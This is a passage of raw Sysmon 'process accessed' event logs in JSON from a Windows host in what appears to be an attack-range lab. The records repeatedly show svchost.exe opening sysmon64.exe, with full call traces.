06:55:19.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5757,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5758,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5759,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5760,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5761,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5762,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5763,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5764,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 